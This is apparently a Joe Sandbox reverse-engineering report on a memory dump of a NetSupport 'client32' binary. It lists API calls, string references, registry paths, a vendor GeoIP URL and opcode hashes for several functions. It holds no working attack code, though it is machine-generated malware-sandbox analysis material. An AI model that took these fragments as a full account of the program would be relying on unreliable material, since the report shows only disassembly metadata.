0x11028fa2
0x11028fa4
0x11028fa5
0x11028fa6
0x11028fa6
0x00000000
0x11028faa
0x11028f67
0x11028f70
0x11028f70
0x11028f72
0x11028f74
0x11028f75
0x11028f76
0x11028f76
0x00000000
0x11028f7a
0x11028f37
0x11028f40
0x11028f40
0x11028f42
0x11028f44
0x11028f45
0x11028f46
0x11028f46
0x00000000
0x11028f4a
0x11028f07
0x11028f10
0x11028f10
0x11028f12
0x11028f14
0x11028f15
0x11028f16
0x11028f16
0x00000000
0x11028f1a
0x11028ed7
0x11028ee0
0x11028ee0
0x11028ee2
0x11028ee4
0x11028ee5
0x11028ee6
0x11028ee6
0x00000000
0x11028eea
0x11028ea7
0x11028eb0
0x11028eb0
0x11028eb2
0x11028eb4
0x11028eb5
0x11028eb6
0x11028eb6
0x00000000
0x11028eba
0x11028e76
0x11028e80
0x11028e80
0x11028e82
0x11028e84
0x11028e85
0x11028e86
0x11028e86
0x00000000
0x11028e8a
0x11028e05
0x11028e1e
0x11028e1e
0x11028e21
0x11028e27
0x11028e27
0x00000000
0x11028e21
0x11028e07
0x11028e0e
0x11028e14
0x11028e14
0x11028e16
0x11028e18
0x11028e19
0x11028e1a
0x00000000
0x110291ce
0x110291ce
0x110291d6
0x110291dc
0x00000000
0x11028de0
0x11028d82
0x11028d85
0x00000000
0x00000000
0x00000000
0x11028c96
0x11028c9c
0x11028c9c
0x11028ca0
0x11028ca0
0x11028ca3
0x11028ca6
0x00000000
0x11028ca8
0x11028ca8
0x11028cae
0x00000000
0x11028cae
0x11028ca6
0x11028c70
0x11028c70
0x11028c72
0x11028c75
0x11028c78
0x00000000
0x11028c7a
0x11028c7a
0x11028c80
0x00000000
0x11028c80
0x11028c78

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,738E1340,?,0000001A), ref: 11028CFD
_strrchr.LIBCMT ref: 11028D0C

Part of subcall function 1116558E: __stricmp_l.LIBCMT ref: 111655CB

Strings

TechConsole, xrefs: 1102913D
ShortName, xrefs: 11028EC5
NSSConfName, xrefs: 11029075
\, xrefs: 11028C8C
??I, xrefs: 11029317
NSMAppDataDir, xrefs: 11029015
NSSLongCaption, xrefs: 11029175
??F, xrefs: 11029290
TLA, xrefs: 11028F25
Home, xrefs: 11028EF5
SupportEMail, xrefs: 11028FE5
product.dat, xrefs: 11028CC0, 11028D11
LongName, xrefs: 11028E95
AssistantURL, xrefs: 110290D9
SupportsChrome, xrefs: 11029106
NSSName, xrefs: 11028F55
NSSAppDataDir, xrefs: 11029045
SupportWWW, xrefs: 11028FB5
SupportsAndroid, xrefs: 110291A2
AssistantName, xrefs: 110290AC
Name, xrefs: 11028E5E
NSSTLA, xrefs: 11028F85

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileModuleName__stricmp_l_strrchr
String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
API String ID: 1609618855-357498123
Opcode ID: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
Instruction ID: 6dd15402a7eb79c0789e25bc58f14fe58cbd6334f89e1d0f8744b7b944579b3b
Opcode Fuzzy Hash: bda617b4801821ad68c06afa38a0a882f0d0530b8b097215d3e19e3faa20ac69
Instruction Fuzzy Hash: 86120738D052A68FDB16CF64CC84BE8B7F4AB1634CF5000EED9D597601EB72568ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 1102CB60 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 256
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
GetTickCount.KERNEL32 ref: 1102CBCA

Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A

GetTickCount.KERNEL32 ref: 1102CCC4

Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB

Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D

WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
CloseHandle.KERNEL32(?), ref: 1102CDD8

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1102CE09, 1102CE1D, 1102CE31, 1102CE45
GeoIP, xrefs: 1102CC13
http://geo.netsupportsoftware.com/location/loca.asp, xrefs: 1102CBE5
GetLatLong=%s, took %d ms, xrefs: 1102CCE1
_debug, xrefs: 1102CC18, 1102CC7A
IsA(), xrefs: 1102CE0E, 1102CE22, 1102CE36, 1102CE4A
LatLong, xrefs: 1102CB88, 1102CC75
?IP=%s, xrefs: 1102CC56

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
API String ID: 596640303-1725438197
Opcode ID: ce604f4e0696eb9d04d8618de06a3f6b6b70cd3c5a2b9fb292cf5b6ca4d2491c
Instruction ID: 4f3bd53bc8d19e72287e58b17b31a22f9b89b15acabdf1a04f68b78acb210870
Opcode Fuzzy Hash: ce604f4e0696eb9d04d8618de06a3f6b6b70cd3c5a2b9fb292cf5b6ca4d2491c
Instruction Fuzzy Hash: C2919274E0020A9BDF04DBE4CD90FEEF7B5AF55308F508259E8266B284DB74B905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 11145C70 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175
registryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExA.KERNEL32(111F1EF0,775EC740), ref: 11145CA0
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
_memset.LIBCMT ref: 11145CFD

Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,775EC740,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0

_strncpy.LIBCMT ref: 11145DCA

Part of subcall function 111648ED: __isdigit_l.LIBCMT ref: 11164912

RegCloseKey.KERNEL32(00000000), ref: 11145E66

Strings

CurrentMinorVersionNumber, xrefs: 11145E30
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 11145CCB
CurrentVersion, xrefs: 11145D44
Service Pack, xrefs: 11145EAD
CSDVersion, xrefs: 11145D1A
CurrentMajorVersionNumber, xrefs: 11145DF8

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
API String ID: 3299820421-2117887902
Opcode ID: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
Instruction ID: 72e9b589e9c81c7730d33f5d85faf9c496c6ad46d8e7039c924549f2bc0033ac
Opcode Fuzzy Hash: 929fb5d8b7f52e0b88e664298c84f703fc5a1542ba09115f26204fab96234c05
Instruction Fuzzy Hash: A4510871E0023BABDB21CF61CD41FDEF7B9AB01B0CF1040A9E91D66945E7B16A49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1115F240 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAddAtomA.KERNEL32 ref: 1115F268
GetLastError.KERNEL32 ref: 1115F275
wsprintfA.USER32 ref: 1115F288

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4

GlobalAddAtomA.KERNEL32 ref: 1115F2CC
GlobalAddAtomA.KERNEL32 ref: 1115F2D9

Strings

NSMDropTarget, xrefs: 1115F2CE
NSMWndClass, xrefs: 1115F260
NSMReflect, xrefs: 1115F2C7
GlobalAddAtom failed, e=%d, xrefs: 1115F282
..\ctl32\wndclass.cpp, xrefs: 1115F299, 1115F2B5
m_aProp, xrefs: 1115F2BA

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
API String ID: 1734919802-1728070458
Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81

Uniqueness

Uniqueness Score: -1.00%

Function 11110DE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 11110E4A
__CxxThrowException@8.LIBCMT ref: 11110E5F
GetCurrentThreadId.KERNEL32 ref: 11110E76
InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F

Strings

QueueThreadEvent, xrefs: 11110EEB
..\ctl32\Refcount.cpp, xrefs: 11110EE6

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
API String ID: 1976012330-1024648535
Opcode ID: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
Opcode Fuzzy Hash: d645c5834ea71053a0f95081aaaa0ddb1bcc4547c3ef44f405f5b2b37748006b
Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91

Uniqueness

Uniqueness Score: -1.00%

Function 11146010 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 11145F00: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4

_memset.LIBCMT ref: 11146055
GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
FreeLibrary.KERNEL32(00000000), ref: 111460BF
GetSystemDefaultLangID.KERNEL32 ref: 111460CA

Strings

GetUserDefaultUILanguage, xrefs: 111460A1
kernel32.dll, xrefs: 11146080

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
String ID: GetUserDefaultUILanguage$kernel32.dll
API String ID: 4251163631-545709139
Opcode ID: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
Instruction ID: 3f0f124d44211a8ad3fb9d67620e20a9ac0b69379346808ac7e8dd1e07daf2e5
Opcode Fuzzy Hash: d16ef3f8451e0833cf110c528b048f63f93f72395641363cf9238af7566ccf25
Instruction Fuzzy Hash: 8731C370E00229CFDB21DFB5CA84B9AF7B4EB45B1CF640575D829D3A85CB744984CB51

Uniqueness

Uniqueness Score: -1.00%

Function 110155C0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 1101567A
_memset.LIBCMT ref: 110156BE
RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 110156F8

Strings

PackedCatalogItem, xrefs: 110156E2
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 110155FB
NSLSP, xrefs: 11015708
%012d, xrefs: 11015674

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue_memsetwsprintf
String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
API String ID: 1333399081-1346142259
Opcode ID: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
Instruction ID: a64b799103adf9c135d53574b09e6be9cb50a11e46eb2186d5edb4ec0545667f
Opcode Fuzzy Hash: 84934bdfb91b7ebcf4e6f2c3203863e6180bcc70d996f63089e2766c34812b78
Instruction Fuzzy Hash: 70419E71D022699EEB10DF64DD94BDEF7B8EB04314F0445E8D819A7281EB34AB48CF90

Uniqueness

Uniqueness Score: -1.00%

Function 11010140 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
std::_Lockit::_Lockit.LIBCPMT ref: 11010190
std::bad_exception::bad_exception.LIBCMT ref: 11010214
__CxxThrowException@8.LIBCMT ref: 11010222
std::_Lockit::_Lockit.LIBCPMT ref: 11010235
std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F

Strings

bad cast, xrefs: 1101020C

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 4b3f858ebc0426ead76b86d9121e1f9dc6cb804146d186f75a8d1f8c1ed44c34
Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
Opcode Fuzzy Hash: 4b3f858ebc0426ead76b86d9121e1f9dc6cb804146d186f75a8d1f8c1ed44c34
Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91

Uniqueness

Uniqueness Score: -1.00%

Function 111457A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

FALSE || !"wrong nsmdir", xrefs: 1114586E
..\ctl32\util.cpp, xrefs: 111457C7, 11145869
nsmdir < GP_MAX, xrefs: 111457CC

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
API String ID: 3494822531-1878648853
Opcode ID: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
Opcode Fuzzy Hash: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91

Uniqueness

